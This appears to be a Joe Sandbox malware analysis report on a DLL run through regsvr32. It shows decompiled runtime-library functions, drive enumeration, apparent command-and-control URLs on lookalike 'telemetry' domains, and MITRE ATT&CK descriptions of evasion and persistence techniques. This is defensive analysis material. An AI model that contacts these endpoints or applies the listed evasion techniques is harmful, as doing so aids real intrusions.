Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 022420c7774981f0d0274973f43caf173173a85f6f0af599301e7cd8b598b79f
Instruction ID: 8c60638dec74fc15d6a68a778062efc3c2aae44442ba510e224a1c2eba3667c9
Opcode Fuzzy Hash: 022420c7774981f0d0274973f43caf173173a85f6f0af599301e7cd8b598b79f
Instruction Fuzzy Hash: 28F0123A400529FBCF522FF5EC08DDA3F66EB0A3B1B014416FA1889120D77288609BD0

Uniqueness

Uniqueness Score: -1.00%

Function 6E45F9D0 Relevance: 6.0, APIs: 4, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E45F9D0() {

				E6E4610BE( *0x6e475830);
				 *0x6e475830 = 0;
				E6E4610BE( *0x6e475834);
				 *0x6e475834 = 0;
				E6E4610BE( *0x6e4759b0);
				 *0x6e4759b0 = 0;
				E6E4610BE( *0x6e4759b4);
				 *0x6e4759b4 = 0;
				return 1;
			}

0x6e45f9d9
0x6e45f9e6
0x6e45f9ec
0x6e45f9f7
0x6e45f9fd
0x6e45fa08
0x6e45fa0e
0x6e45fa16
0x6e45fa1f

APIs

_free.LIBCMT ref: 6E45F9D9

Part of subcall function 6E4610BE: HeapFree.KERNEL32(00000000,00000000), ref: 6E4610D4
Part of subcall function 6E4610BE: GetLastError.KERNEL32(00000004,?,6E4679F5,00000004,00000000,00000004,?,?,6E467A1C,00000004,00000007,00000004,?,6E464A49,00000004,00000004), ref: 6E4610E6

_free.LIBCMT ref: 6E45F9EC
_free.LIBCMT ref: 6E45F9FD
_free.LIBCMT ref: 6E45FA0E

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 6e0ffc051378b71131de81a1e8aa31c6789f693949e8a013b61910d1dc811921
Instruction ID: db4d4dcdbbe76732545bf2715365eb9e33ed5cfee8c25c5b1ebf6ca53342f5bf
Opcode Fuzzy Hash: 6e0ffc051378b71131de81a1e8aa31c6789f693949e8a013b61910d1dc811921
Instruction Fuzzy Hash: 6DE04FB0C139709BDE113F71B900C893BA6B746610746154AE8180E314C77A0821DAC2

Uniqueness

Uniqueness Score: -1.00%

Function 6E45C6F5 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 112
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 72%

			E6E45C6F5(void* __ecx, void* __edx, signed char* _a4, signed char* _a8, intOrPtr _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
				signed int _v8;
				signed int _v12;
				intOrPtr* _v16;
				signed int _v20;
				char _v24;
				intOrPtr _v28;
				signed int _v36;
				void* _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr _v56;
				void _v60;
				signed char* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t74;
				void* _t75;
				char _t76;
				signed char _t78;
				signed int _t80;
				signed char* _t81;
				signed int _t82;
				signed int _t83;
				intOrPtr* _t87;
				void* _t90;
				signed char* _t93;
				intOrPtr* _t96;
				signed char _t97;
				intOrPtr _t98;
				intOrPtr _t99;
				intOrPtr* _t101;
				signed int _t102;
				signed int _t103;
				signed char _t108;
				signed char* _t111;
				signed int _t112;
				void* _t113;
				signed char* _t116;
				void* _t121;
				signed int _t123;
				void* _t130;
				void* _t131;

				_t110 = __edx;
				_t100 = __ecx;
				_t96 = _a4;
				if( *_t96 == 0x80000003) {
					return _t74;
				} else {
					_push(_t121);
					_push(_t113);
					_t75 = E6E45C006(_t96, __ecx, __edx, _t113, _t121);
					if( *((intOrPtr*)(_t75 + 8)) != 0) {
						__imp__EncodePointer(0);
						_t121 = _t75;
						if( *((intOrPtr*)(E6E45C006(_t96, __ecx, __edx, 0, _t121) + 8)) != _t121 &&  *_t96 != 0xe0434f4d &&  *_t96 != 0xe0434352) {
							_t87 = E6E45B3A2(__edx, 0, _t121, _t96, _a8, _a12, _a16, _a20, _a28, _a32);
							_t130 = _t130 + 0x1c;
							if(_t87 != 0) {
								L16:
								return _t87;
							}
						}
					}
					_t76 = _a20;
					_v24 = _t76;
					_v20 = 0;
					if( *((intOrPtr*)(_t76 + 0xc)) > 0) {
						_push(_a28);
						E6E45B2D5(_t96, _t100, 0, _t121,  &_v40,  &_v24, _a24, _a16, _t76);
						_t112 = _v36;
						_t131 = _t130 + 0x18;
						_t87 = _v40;
						_v16 = _t87;
						_v8 = _t112;
						if(_t112 < _v28) {
							_t102 = _t112 * 0x14;
							_v12 = _t102;
							do {
								_t103 = 5;
								_t90 = memcpy( &_v60,  *((intOrPtr*)( *_t87 + 0x10)) + _t102, _t103 << 2);
								_t131 = _t131 + 0xc;
								if(_v60 <= _t90 && _t90 <= _v56) {
									_t93 = _v44 + 0xfffffff0 + (_v48 << 4);
									_t108 = _t93[4];
									if(_t108 == 0 ||  *((char*)(_t108 + 8)) == 0) {
										if(( *_t93 & 0x00000040) == 0) {
											_push(0);
											_push(1);
											E6E45C2CB(_t112, _t96, _a8, _a12, _a16, _a20, _t93, 0,  &_v60, _a28, _a32);
											_t112 = _v8;
											_t131 = _t131 + 0x30;
										}
									}
								}
								_t112 = _t112 + 1;
								_t87 = _v16;
								_t102 = _v12 + 0x14;
								_v8 = _t112;
								_v12 = _t102;
							} while (_t112 < _v28);
						}
						goto L16;
					}
					E6E460332(_t96, _t100, _t110, 0, _t121);
					asm("int3");
					_t111 = _v68;
					_push(_t96);
					_push(_t121);
					_push(0);
					_t78 = _t111[4];
					if(_t78 == 0) {
						L41:
						_t80 = 1;
					} else {
						_t101 = _t78 + 8;
						if( *_t101 == 0) {
							goto L41;
						} else {
							_t116 = _a4;
							if(( *_t111 & 0x00000080) == 0 || ( *_t116 & 0x00000010) == 0) {
								_t97 = _t116[4];
								_t123 = 0;
								if(_t78 == _t97) {
									L33:
									if(( *_t116 & 0x00000002) == 0 || ( *_t111 & 0x00000008) != 0) {
										_t81 = _a8;
										if(( *_t81 & 0x00000001) == 0 || ( *_t111 & 0x00000001) != 0) {
											if(( *_t81 & 0x00000002) == 0 || ( *_t111 & 0x00000002) != 0) {
												_t123 = 1;
											}
										}
									}
									_t80 = _t123;
								} else {
									_t59 = _t97 + 8; // 0x6e
									_t82 = _t59;
									while(1) {
										_t98 =  *_t101;
										if(_t98 !=  *_t82) {
											break;
										}
										if(_t98 == 0) {
											L29:
											_t83 = _t123;
										} else {
											_t99 =  *((intOrPtr*)(_t101 + 1));
											if(_t99 !=  *((intOrPtr*)(_t82 + 1))) {
												break;
											} else {
												_t101 = _t101 + 2;
												_t82 = _t82 + 2;
												if(_t99 != 0) {
													continue;
												} else {
													goto L29;
												}
											}
										}
										L31:
										if(_t83 == 0) {
											goto L33;
										} else {
											_t80 = 0;
										}
										goto L42;
									}
									asm("sbb eax, eax");
									_t83 = _t82 | 0x00000001;
									goto L31;
								}
							} else {
								goto L41;
							}
						}
					}
					L42:
					return _t80;
				}
			}

0x6e45c6f5
0x6e45c6f5
0x6e45c6fc
0x6e45c705
0x6e45c824
0x6e45c70b
0x6e45c70b
0x6e45c70c
0x6e45c70d
0x6e45c717
0x6e45c71a
0x6e45c720
0x6e45c72a
0x6e45c74f
0x6e45c754
0x6e45c759
0x6e45c820
0x00000000
0x6e45c821
0x6e45c759
0x6e45c72a
0x6e45c75f
0x6e45c762
0x6e45c765
0x6e45c76b
0x6e45c771
0x6e45c783
0x6e45c788
0x6e45c78b
0x6e45c78e
0x6e45c791
0x6e45c794
0x6e45c79a
0x6e45c7a0
0x6e45c7a3
0x6e45c7a6
0x6e45c7b5
0x6e45c7b6
0x6e45c7b6
0x6e45c7bb
0x6e45c7ce
0x6e45c7d0
0x6e45c7d5
0x6e45c7e0
0x6e45c7e2
0x6e45c7e4
0x6e45c800
0x6e45c805
0x6e45c808
0x6e45c808
0x6e45c7e0
0x6e45c7d5
0x6e45c80e
0x6e45c80f
0x6e45c812
0x6e45c815
0x6e45c818
0x6e45c81b
0x6e45c7a6
0x00000000
0x6e45c79a
0x6e45c825
0x6e45c82a
0x6e45c82e
0x6e45c831
0x6e45c832
0x6e45c833
0x6e45c834
0x6e45c839
0x6e45c8b1
0x6e45c8b3
0x6e45c83b
0x6e45c83b
0x6e45c841
0x00000000
0x6e45c843
0x6e45c846
0x6e45c849
0x6e45c850
0x6e45c853
0x6e45c857
0x6e45c889
0x6e45c88c
0x6e45c893
0x6e45c899
0x6e45c8a3
0x6e45c8ac
0x6e45c8ac
0x6e45c8a3
0x6e45c899
0x6e45c8ad
0x6e45c859
0x6e45c859
0x6e45c859
0x6e45c85c
0x6e45c85c
0x6e45c860
0x00000000
0x00000000
0x6e45c864
0x6e45c878
0x6e45c878
0x6e45c866
0x6e45c866
0x6e45c86c
0x00000000
0x6e45c86e
0x6e45c86e
0x6e45c871
0x6e45c876
0x00000000
0x00000000
0x00000000
0x00000000
0x6e45c876
0x6e45c86c
0x6e45c881
0x6e45c883
0x00000000
0x6e45c885
0x6e45c885
0x6e45c885
0x00000000
0x6e45c883
0x6e45c87c
0x6e45c87e
0x00000000
0x6e45c87e
0x00000000
0x00000000
0x00000000
0x6e45c849
0x6e45c841
0x6e45c8b4
0x6e45c8b8
0x6e45c8b8

APIs

EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 6E45C71A

Strings

RCC, xrefs: 6E45C734
MOC, xrefs: 6E45C72C

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: EncodePointer
String ID: MOC$RCC
API String ID: 2118026453-2084237596
Opcode ID: e96994274609ae3eba90d6e8bdec5e328be2e9c13b94d115e0d42826a89c3d9a
Instruction ID: 36c2d9ad20be4ddad8791494d0ccc0af884527ba2989d8bd0bd0c73b08072b85
Opcode Fuzzy Hash: e96994274609ae3eba90d6e8bdec5e328be2e9c13b94d115e0d42826a89c3d9a
Instruction Fuzzy Hash: D441467290020AAFCF05CFE4C980EEE7BB5BF48304F15845AE915BA361D3359960DBA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E45D6EB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 66
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E45D6EB(void* __ecx) {
				intOrPtr _t9;
				intOrPtr _t14;
				intOrPtr _t18;
				signed int _t21;
				signed int _t28;
				intOrPtr _t30;
				intOrPtr _t31;

				_t9 =  *0x6e475404; // 0x200
				_t30 = 3;
				if(_t9 != 0) {
					__eflags = _t9 - _t30;
					if(_t9 < _t30) {
						_t9 = _t30;
						goto L4;
					}
				} else {
					_t9 = 0x200;
					L4:
					 *0x6e475404 = _t9;
				}
				 *0x6e475408 = E6E4610F8(_t9, 4);
				E6E4610BE(0);
				if( *0x6e475408 != 0) {
					L8:
					_t28 = 0;
					__eflags = 0;
					_t31 = 0x6e474050;
					do {
						_t1 = _t31 + 0x20; // 0x6e474070
						E6E46144B(__eflags, _t1, 0xfa0, 0);
						_t14 =  *0x6e475408; // 0x773f08
						 *((intOrPtr*)(_t14 + _t28 * 4)) = _t31;
						_t18 =  *((intOrPtr*)( *((intOrPtr*)(0x6e475620 + (_t28 >> 6) * 4)) + 0x18 + (_t28 & 0x0000003f) * 0x38));
						__eflags = _t18 - 0xffffffff;
						if(_t18 == 0xffffffff) {
							L12:
							 *((intOrPtr*)(_t31 + 0x10)) = 0xfffffffe;
						} else {
							__eflags = _t18 - 0xfffffffe;
							if(_t18 == 0xfffffffe) {
								goto L12;
							} else {
								__eflags = _t18;
								if(_t18 == 0) {
									goto L12;
								}
							}
						}
						_t31 = _t31 + 0x38;
						_t28 = _t28 + 1;
						__eflags = _t31 - 0x6e4740f8;
					} while (__eflags != 0);
					__eflags = 0;
					return 0;
				} else {
					 *0x6e475404 = _t30;
					 *0x6e475408 = E6E4610F8(_t30, 4);
					_t21 = E6E4610BE(0);
					if( *0x6e475408 != 0) {
						goto L8;
					} else {
						return _t21 | 0xffffffff;
					}
				}
			}

0x6e45d6eb
0x6e45d6f3
0x6e45d6f6
0x6e45d6ff
0x6e45d701
0x6e45d703
0x00000000
0x6e45d703
0x6e45d6f8
0x6e45d6f8
0x6e45d705
0x6e45d705
0x6e45d705
0x6e45d714
0x6e45d719
0x6e45d728
0x6e45d755
0x6e45d756
0x6e45d756
0x6e45d758
0x6e45d75d
0x6e45d764
0x6e45d768
0x6e45d76d
0x6e45d777
0x6e45d789
0x6e45d78d
0x6e45d790
0x6e45d79b
0x6e45d79b
0x6e45d792
0x6e45d792
0x6e45d795
0x00000000
0x6e45d797
0x6e45d797
0x6e45d799
0x00000000
0x00000000
0x6e45d799
0x6e45d795
0x6e45d7a2
0x6e45d7a5
0x6e45d7a6
0x6e45d7a6
0x6e45d7af
0x6e45d7b2
0x6e45d72a
0x6e45d72d
0x6e45d73a
0x6e45d73f
0x6e45d74e
0x00000000
0x6e45d750
0x6e45d754
0x6e45d754
0x6e45d74e

APIs

_free.LIBCMT ref: 6E45D719
_free.LIBCMT ref: 6E45D73F

Strings

P@Gn, xrefs: 6E45D758

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: _free
String ID: P@Gn
API String ID: 269201875-2413938915
Opcode ID: 4190f6261636c7206ce57628b766f94cf321784d9184b31271117c244141db49
Instruction ID: 8607b7eba66f4a686e36767aceab98c9ad7d0a661be92a3887402a72651560ab
Opcode Fuzzy Hash: 4190f6261636c7206ce57628b766f94cf321784d9184b31271117c244141db49
Instruction Fuzzy Hash: 2511E631A10A204BDF10AFBAAC40F863368AB42335F200A5BE528DF3C5E774C4878BC1

Uniqueness

Uniqueness Score: -1.00%

Function 6E45B080 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E45B080(intOrPtr* __ecx, void* __eflags) {
				intOrPtr* _t13;

				_t13 = __ecx;
				E6E45B0D3(__ecx);
				 *__ecx = 0x38;
				 *((intOrPtr*)(__ecx + 8)) = 0x6e410000;
				 *((intOrPtr*)(__ecx + 4)) = 0x6e410000;
				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
				 *((intOrPtr*)(__ecx + 0x10)) = 0x6e46c284;
				if(E6E416880(__ecx + 0x14) < 0) {
					if(IsDebuggerPresent() != 0) {
						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
					}
					 *0x6e474aa0 = 1;
				}
				return _t13;
			}

0x6e45b081
0x6e45b083
0x6e45b08d
0x6e45b096
0x6e45b099
0x6e45b09c
0x6e45b0a3
0x6e45b0b1
0x6e45b0bb
0x6e45b0c2
0x6e45b0c2
0x6e45b0c8
0x6e45b0c8
0x6e45b0d2

APIs

Part of subcall function 6E416880: InitializeCriticalSectionEx.KERNEL32(?,00000000,00000000), ref: 6E416898
Part of subcall function 6E416880: GetLastError.KERNEL32 ref: 6E4168A2

IsDebuggerPresent.KERNEL32(?,?,?,6E41124A), ref: 6E45B0B3
OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,6E41124A), ref: 6E45B0C2

Strings

ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 6E45B0BD

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: CriticalDebugDebuggerErrorInitializeLastOutputPresentSectionString
String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
API String ID: 3511171328-631824599
Opcode ID: 653045dfdaeef539a9f153cedd8f32c179b1fb5f794631686e4862ea66c60840
Instruction ID: 3778ce77829c86026e740f138ca601405b037755f3b59d3a1c70a9b7bd124ac4
Opcode Fuzzy Hash: 653045dfdaeef539a9f153cedd8f32c179b1fb5f794631686e4862ea66c60840
Instruction Fuzzy Hash: 26E03970505B518FDBB0AFF4E004BA2BBE8AF01644F044A1FD8A6CA740E7B0D0488BA1

Uniqueness

Uniqueness Score: -1.00%

Function 6E463DD9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E6E463DD9() {

				 *0x6e4759b8 = GetCommandLineA();
				 *0x6e4759bc = GetCommandLineW();
				return 1;
			}

0x6e463ddf
0x6e463dea
0x6e463df1

APIs

GetCommandLineA.KERNEL32 ref: 6E463DD9
GetCommandLineW.KERNEL32 ref: 6E463DE4

Strings

h*r, xrefs: 6E463DDF

Memory Dump Source

Source File: 0000000C.00000002.1160881545.000000006E411000.00000020.00000001.01000000.00000009.sdmp, Offset: 6E410000, based on PE: true

Associated: 0000000C.00000002.1160866965.000000006E410000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1160998743.000000006E46C000.00000002.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161008297.000000006E474000.00000004.00000001.01000000.00000009.sdmpDownload File
Associated: 0000000C.00000002.1161014163.000000006E476000.00000002.00000001.01000000.00000009.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_6e410000_regsvr32.jbxd

Similarity

API ID: CommandLine
String ID: h*r
API String ID: 3253501508-1759879090
Opcode ID: f1fc0fd5629cfe43a3598dfff473674d28fe424e5a6dda04eb88d81d66366f29
Instruction ID: b7070f60a7b8189226231464c01e55f322e838e8226b6e943a97416e548229d3
Opcode Fuzzy Hash: f1fc0fd5629cfe43a3598dfff473674d28fe424e5a6dda04eb88d81d66366f29
Instruction Fuzzy Hash: F9B092F8806A108FEF80BF30F00D0987BB0B20A662780405AD401CAB01D73C1440CFA0

Uniqueness

Uniqueness Score: -1.00%

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Source: regsvr32.exe	String found in binary or memory: http://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/home.aspx
Source: regsvr32.exe	String found in binary or memory: http://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx
Source: regsvr32.exe	String found in binary or memory: https://collectiontelemetrysystem.com/m8YYdu/mCQ2U9/auth.aspx
Source: regsvr32.exe	String found in binary or memory: https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/auth.aspx
Source: regsvr32.exe	String found in binary or memory: https://telemetrysystemcollection.com/m8YYdu/mCQ2U9/home.aspx

Description:	Adversaries may move onto systems, possibly those on disconnected or air-gapped networks, by copying malware to removable media and taking advantage of Autorun features when the media is inserted into a system and executes. In the case of Lateral Movement, this may occur through modification of executable files stored on removable media or by copying malware and renaming it to look like a legitimate file to trick users into executing it on a separate system. In the case of Initial Access, this may occur through manual manipulation of the media, modification of systems used to initially format the media, or modification to the media's firmware itself.
Tactics:	Initial Access, Lateral Movement
Data Sources:	Data loss prevention, File monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may delete files left behind by the actions of their intrusion activity. Malware, tools, or other non-native files dropped or created on a system by an adversary may leave traces to indicate to what was done within a network and how. Removal of these files can occur during an intrusion, or as part of a post-intrusion process to minimize the adversary's footprint.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to hide configuration information within Registry keys, remove information as part of cleaning up, or as part of other techniques to aid in persistence and execution.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to gather information about attached peripheral devices and components connected to a computer system. Peripheral devices could include auxiliary resources that support a variety of functionalities such as keyboards, printers, cameras, smart card readers, or removable storage. The information may be used to enhance their awareness of the system and network environment or may be used for further actions.
Tactics:	Discovery
Data Sources:	API monitoring, PowerShell logs, Process command-line parameters, Process monitoring
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

